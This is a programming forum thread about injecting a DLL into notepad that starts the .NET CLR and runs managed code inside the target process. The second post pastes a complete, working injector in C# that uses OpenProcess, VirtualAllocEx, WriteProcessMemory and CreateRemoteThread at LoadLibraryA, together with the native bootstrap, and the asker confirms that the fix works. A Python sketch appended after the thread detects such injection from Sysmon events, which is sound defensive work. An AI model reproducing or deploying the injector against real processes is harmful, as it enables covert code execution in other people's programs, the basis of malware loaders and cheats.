[c++] Error when starting CLR Runtime Host

  1. #1
    Danbannan

    Hello, I have been a member for quite a while but I haven't written that much in here, so I guess a little introduction would be in place.
    My name is Dan-Levi, I am 30 years old. I started out with server-side web development about 12 years ago, just until 4 years ago when I started learning C# and all that .NET shizzle, and now I am interested in learning about C++.

    So I'm working on a simple DLL injection which loads the CLR and (eventually) a managed DLL. I am able to inject the unmanaged DLL into the process (notepad in this case), but I struggle getting the CLR to start.

    This is what I got so far:

    Code:
    #include "stdafx.h"
    #include <Windows.h>
    #include <metahost.h>
    #pragma comment(lib, "mscoree.lib")
    
    #import "mscorlib.tlb" raw_interfaces_only \
        high_property_prefixes("_get","_put","_putref") \
        rename("ReportEvent", "InteropServices_ReportEvent")
    
    void LoadDotNet()
    {
        HRESULT hr;
        ICLRMetaHost *pMetaHost = NULL;
        ICLRRuntimeInfo *pRuntimeInfo = NULL;
        ICLRRuntimeHost *pClrRuntimeHost = NULL;
    
        hr = CLRCreateInstance(CLSID_CLRMetaHost, IID_PPV_ARGS(&pMetaHost));
        hr = pMetaHost->GetRuntime(L"v4.0.30319", IID_PPV_ARGS(&pRuntimeInfo));
        hr = pRuntimeInfo->GetInterface(CLSID_CLRRuntimeHost,
            IID_PPV_ARGS(&pClrRuntimeHost));
    
        MessageBox(NULL, L"Runs up to here...", L"DEBUG", NULL);
        // start runtime
        hr = pClrRuntimeHost->Start();
        pMetaHost->Release();
        pRuntimeInfo->Release();
        pClrRuntimeHost->Release();
    }
    
    BOOL APIENTRY DllMain(HMODULE hModule,
        DWORD  ul_reason_for_call,
        LPVOID lpReserved
        )
    {
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
            //printf("DLL Loaded!");
            LoadDotNet();
        }
        return TRUE;
    }
    So all HRESULT hr returns S_OK until I actually try to start the CLR:
    Code:
    hr = pClrRuntimeHost->Start();
    Since I'm coming over from C# and have little to no experience writing C++, I understand the syntax and can make an understanding of the code, but I don't know exactly how to do error handling in the right manner in every situation.

    I was hoping that some of you could have a look and give me some pointers so I can learn from this and eventually give back to the community with full source once it all is in place.

    I want to know how I can debug my code once it is injected into the other process. I have tried to use try/catch blocks but no exception is thrown from the CLR, and even inside the try block it crashes.

    I want to add that after I inject this DLL, clr.dll is in the list of loaded DLLs (Process Explorer), but it seems that it fails to start.
    I am running this on a Windows 10 x64 setup.

    Cheers and thanks for the great community with a lot of cool content.

  2. #2
    XTBZ
    I found this by searching


    #include <windows.h>
    #include <mscoree.h>
    #include <metahost.h>
    #pragma comment(lib, "mscoree.lib")

    wchar_t szDllName[] = L"DummyNetApplication.dll";
    wchar_t szDllMain[] = L"DummyNetApplication.Program";
    wchar_t szDllEntryPoint[] = L"EntryPoint";
    wchar_t szDllParams[] = L"Parameter";
    wchar_t szDllPath[MAX_PATH];

    void StartTheDotNetRuntime()
    {
        ICLRMetaHost *pMetaHost = nullptr;
        ICLRRuntimeInfo *pRuntimeInfo = nullptr;
        ICLRRuntimeHost *pRuntimeHost = nullptr;
        CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (LPVOID*)&pMetaHost);
        pMetaHost->GetRuntime(L"v4.0.30319", IID_ICLRRuntimeInfo, (LPVOID*)&pRuntimeInfo);
        BOOL loadable = FALSE;
        pRuntimeInfo->IsLoadable(&loadable);
        if (loadable == FALSE)
            return;
        pRuntimeInfo->GetInterface(CLSID_CLRRuntimeHost, IID_ICLRRuntimeHost, (LPVOID*)&pRuntimeHost);
        BOOL isStarted;
        DWORD startupFlags;
        pRuntimeInfo->IsStarted(&isStarted, &startupFlags);
        if (!isStarted)
        {
            pRuntimeHost->Start();
            pRuntimeInfo->BindAsLegacyV2Runtime();
        }
        pRuntimeHost->ExecuteInDefaultAppDomain(szDllPath, szDllMain, szDllEntryPoint, szDllParams, nullptr);
        if (pRuntimeHost != nullptr)
            pRuntimeHost->Release();

        if (pRuntimeInfo != nullptr)
            pRuntimeInfo->Release();

        if (pMetaHost != nullptr)
            pMetaHost->Release();
    }

    BOOL WINAPI DllMain()
    {
        CreateThread(nullptr, 0, (LPTHREAD_START_ROUTINE)&StartTheDotNetRuntime, nullptr, 0, nullptr);
        return TRUE;
    }

    public class Program
    {
        public static int EntryPoint()
        {
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);
            Application.Run(new StatelessForm());
            return 0;
        }
    }

    public class CodeInjector
    {
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr OpenProcess(uint dwDesiredAccess, int bInheritHandle, uint dwProcessId);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern int CloseHandle(IntPtr hObject);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetModuleHandle(string lpModuleName);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern int WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] buffer, uint size, int lpNumberOfBytesWritten);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttribute, IntPtr dwStackSize, IntPtr lpStartAddress,
            IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        private static CodeInjector _instance;

        public static CodeInjector GetInstance
        {
            get { return _instance ?? (_instance = new CodeInjector()); }
        }

        public InjectionResult Inject(string sProcName, string sDllPath)
        {
            if (!File.Exists(sDllPath))
            {
                return InjectionResult.DllNotFound;
            }

            var procs = Process.GetProcesses();
            var procId = (from t in procs where t.ProcessName == sProcName select (uint)t.Id).FirstOrDefault();

            if (procId == 0)
            {
                return InjectionResult.ProcessNotFound;
            }

            if (!Inject(procId, sDllPath))
            {
                return InjectionResult.InjectionFailed;
            }

            return InjectionResult.InjectionSucceed;
        }

        private static bool Inject(uint pToBeInjected, string sDllPath)
        {
            var hndProc = OpenProcess((0x2 | 0x8 | 0x10 | 0x20 | 0x400), 1, pToBeInjected);

            if (hndProc == IntPtr.Zero)
            {
                return false;
            }

            var lpLlAddress = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");

            if (lpLlAddress == IntPtr.Zero)
            {
                return false;
            }

            var lpAddress = VirtualAllocEx(hndProc, (IntPtr)null, (IntPtr)sDllPath.Length, (0x1000 | 0x2000), 0X40);

            if (lpAddress == IntPtr.Zero)
            {
                return false;
            }

            var bytes = Encoding.ASCII.GetBytes(sDllPath);

            if (WriteProcessMemory(hndProc, lpAddress, bytes, (uint)bytes.Length, 0) == 0)
            {
                return false;
            }

            if (CreateRemoteThread(hndProc, (IntPtr)null, IntPtr.Zero, lpLlAddress, lpAddress, 0, (IntPtr)null) == IntPtr.Zero)
            {
                return false;
            }

            CloseHandle(hndProc);

            return true;
        }
    }

  3. #3
    Danbannan
    That's it! My problem is that I don't spawn a new thread. Since CreateThread is a call to kernel32 it is safe to do in DllMain.

    Just doing this:
    Code:
    BOOL APIENTRY DllMain(HMODULE hModule,
      DWORD  ul_reason_for_call,
      LPVOID lpReserved
      )
    {
      switch (ul_reason_for_call)
      {
      case DLL_PROCESS_ATTACH:
        //printf("DLL Loaded!");
        CreateThread(NULL, 0,
          (LPTHREAD_START_ROUTINE)LoadDotNet, NULL, 0, NULL);
      }
      return TRUE;
    }
    solved my problem. Now to the fun part.

  4. #4
    XTBZ
    It's good
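
Added example (not part of any post in this thread): the first post notes that clr.dll shows up in notepad's module list after the DLL is loaded, and the injector in post #2 starts a remote thread at LoadLibraryA. The sketch below shows how a defender can correlate those two traces. It uses Sysmon field names (Event ID 8 CreateRemoteThread, Event ID 7 ImageLoad); the records, paths, GUIDs, the NATIVE_ONLY allowlist and the 30-second window are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

CLR_MODULES = {"clr.dll", "mscoree.dll", "clrjit.dll"}
NATIVE_ONLY = {"notepad.exe"}   # assumption: local list of processes that never host .NET
WINDOW = timedelta(seconds=30)  # assumption: max gap between remote thread and CLR load

# Constructed records using Sysmon field names; every value here is made up.
SAMPLE_EVENTS = [
    {"EventID": 8, "UtcTime": "2024-01-01 10:00:00.100", "SourceImage": r"C:\Tools\Injector.exe",
     "TargetProcessGuid": "{A-1}", "TargetImage": r"C:\Windows\System32\notepad.exe",
     "StartFunction": "LoadLibraryA"},
    {"EventID": 7, "UtcTime": "2024-01-01 10:00:00.150", "ProcessGuid": "{A-1}",
     "Image": r"C:\Windows\System32\notepad.exe", "ImageLoaded": r"C:\Temp\Bootstrap.dll"},
    {"EventID": 7, "UtcTime": "2024-01-01 10:00:00.900", "ProcessGuid": "{A-1}",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
    {"EventID": 7, "UtcTime": "2024-01-01 10:01:00.000", "ProcessGuid": "{B-1}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
    {"EventID": 7, "UtcTime": "2024-01-01 10:05:00.000", "ProcessGuid": "{C-1}",
     "Image": r"C:\Windows\System32\notepad.exe", "ImageLoaded": r"C:\Windows\System32\mscoree.dll"},
]

def _name(path):
    return path.rsplit("\\", 1)[-1].lower()

def _ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")

def find_unexpected_clr_loads(events):
    """Flag CLR modules loading into native-only processes; raise severity when a
    LoadLibrary* remote thread was created in the same process shortly before."""
    remote_threads, findings = {}, []
    for ev in sorted(events, key=_ts):
        if ev["EventID"] == 8 and ev.get("StartFunction", "").startswith("LoadLibrary"):
            remote_threads[ev["TargetProcessGuid"]] = ev
        elif ev["EventID"] == 7 and _name(ev["ImageLoaded"]) in CLR_MODULES:
            if _name(ev["Image"]) not in NATIVE_ONLY:
                continue  # managed hosts such as powershell.exe load the CLR legitimately
            rt = remote_threads.get(ev["ProcessGuid"])
            correlated = rt is not None and _ts(ev) - _ts(rt) <= WINDOW
            findings.append({
                "process": _name(ev["Image"]), "module": _name(ev["ImageLoaded"]),
                "severity": "high" if correlated else "medium",
                "source": rt["SourceImage"] if correlated else None,
            })
    return findings

if __name__ == "__main__":
    for finding in find_unexpected_clr_loads(SAMPLE_EVENTS):
        print(finding)
```

Sysmon records image loads only when its configuration enables them, so this correlation needs ImageLoad logging turned on for the monitored processes.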
